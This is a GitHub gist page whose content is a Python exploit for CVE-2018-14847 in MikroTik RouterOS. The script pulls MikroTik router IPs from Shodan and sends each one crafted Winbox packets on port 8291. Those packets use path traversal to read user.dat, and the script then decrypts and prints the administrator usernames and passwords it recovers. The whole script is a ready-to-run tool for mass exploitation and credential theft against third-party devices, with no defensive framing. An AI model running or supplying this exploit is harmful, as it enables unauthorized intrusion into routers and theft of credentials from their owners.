Skip to content

Instantly share code, notes, and snippets.

@lliwi

lliwi/mikrotik-CVE-2018-14847.py

Last active February 17, 2023 20:20
Show Gist options
  • Save lliwi/8b4a8cb09cb7369127e4d9f684f606ef to your computer and use it in GitHub Desktop.
Save lliwi/8b4a8cb09cb7369127e4d9f684f606ef to your computer and use it in GitHub Desktop.
Download ZIP
Raw
mikrotik-CVE-2018-14847.py
import shodan
SHODAN_API_KEY = "xxxxxxxxAPI KEY HERE xxxxxxxx"
api = shodan.Shodan(SHODAN_API_KEY)
import os
import sys
import hashlib
import socket
import requests
from subprocess import call
mk_creds_dic = [[],[],[]]
def decrypt_password(user, pass_enc):
key = hashlib.md5(user + b"283i4jfkai3389").digest()
passw = ""
for i in range(0, len(pass_enc)):
passw += chr(pass_enc[i] ^ key[i % len(key)])
return passw.split("\x00")[0]
def extract_user_pass_from_entry(entry):
user_data = entry.split(b"\x01\x00\x00\x21")[1]
pass_data = entry.split(b"\x11\x00\x00\x21")[1]
user_len = user_data[0]
pass_len = pass_data[0]
username = user_data[1:1 + user_len]
password = pass_data[1:1 + pass_len]
return username, password
def get_pair(data):
user_list = []
entries = data.split(b"M2")[1:]
for entry in entries:
try:
user, pass_encrypted = extract_user_pass_from_entry(entry)
except:
continue
pass_plain = decrypt_password(user, pass_encrypted)
user = user.decode("ascii")
user_list.append((user, pass_plain))
return user_list
def dump(data,ip):
user_pass = get_pair(data)
for u, p in user_pass:
print("User:", u)
print("Pass:", p)
print()
mk_creds_dic[0].append(ip)
mk_creds_dic[1].append(u)
mk_creds_dic[2].append(p)
def main():
mk_routers_arr = []
a = [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
0x00, 0x00]
b = [0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x00]
print('[+] getting mikrotik routers from shodan... ')
mk_routers_arr = api.search('mikrotik')
print('[+] Results found: {}'.format(mk_routers_arr['total']))
print('[+] Lets try top get the creds')
#print mk_routers_arr
for result in mk_routers_arr['matches']:
print('checking router with ip: ' + result['ip_str'])
try:
s = socket.socket()
s.settimeout(3)
s.connect((result['ip_str'], 8291))
a = bytearray(a)
b = bytearray(b)
s.send(a)
d = bytearray(s.recv(1024))
b[19] = d[38]
s.send(b)
d = bytearray(s.recv(1024))
print(result['ip_str'])
dump(d[55:],result['ip_str'])
except socket.error:
print('[w] No 8291 port open on ip '+ result['ip_str'])
except UnboundLocalError:
print('[x] Load error on ip '+ result['ip_str'])
print(mk_creds_dic)
return 0
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment